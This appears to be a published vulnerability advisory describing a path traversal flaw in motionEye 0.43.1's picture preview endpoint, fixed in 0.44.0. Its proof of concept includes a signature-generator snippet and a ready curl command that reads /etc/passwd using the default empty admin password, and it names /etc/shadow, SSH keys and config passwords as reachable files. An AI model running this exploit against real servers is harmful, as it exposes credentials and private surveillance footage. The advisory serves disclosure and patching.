Lack of data validation - Path Traversal In motioneye
Description
motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
Summary
motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions like get_media_preview() check for .. sequences in the filename parameter, except get_media_content() which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.
Details
The get_media_content() function properly validates the path:
# mediafiles.py ~line 506 — SAFE def get_media_content(camera_config, path, media_type): target_dir = camera_config['target_dir'] full_path = os.path.join(target_dir, path) if '..' in path: # <-- PATH TRAVERSAL CHECK PRESENT return None ......
But get_media_preview() does NOT:
# mediafiles.py ~line 910 — VULNERABLE def get_media_preview(camera_config, path, media_type, ...): target_dir = camera_config['target_dir'] full_path = os.path.join(target_dir, path) # <-- NO '..' CHECK ...
Similarly, del_media_content() at line ~865 is also missing the check. This is a classic inconsistent fix pattern.
The exploit requires %2F-encoded slashes (..%2F..%2F) which Tornado's URL router does NOT normalize — it passes the raw ../ through to os.path.join().
PoC
Step 1: Authenticate as any user (normal or admin).
Step 2: Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is SHA1("GET:<path>?_username=<user>::<password>"). With the default empty admin password:
#!/usr/bin/env python3 """Signature generator for motionEye path traversal PoC""" import hashlib, re, urllib.parse _SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]\":, -]', re.DOTALL) def compute_signature(method, path, key=''): parts = list(urllib.parse.urlsplit(path))...
Step 3: Send the request using curl --path-as-is (the --path-as-is flag is required — without it, curl normalizes ..%2F and collapses the traversal before sending):
# With default empty admin password, the signature is static: curl --path-as-is -s "http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin&_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c"
Step 4: The server returns the contents of /etc/passwd.
Verified output:
Note on the signature value: The signature
8b387100a519c617bdd66fe629d14b05e09c6e0cis valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as thekeyparameter.
Impact
An authenticated user (normal or admin) can read arbitrary files from the server, including:
/etc/passwd — user enumeration
/etc/motioneye/motion.conf — admin password hash, surveillance password in plaintext
/etc/shadow — password hashes (if running as root, which is default in Docker)
SSH keys, environment variables, and other sensitive configuration files
Surveillance footage from other cameras
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | 0.44.0 |
Aliases
References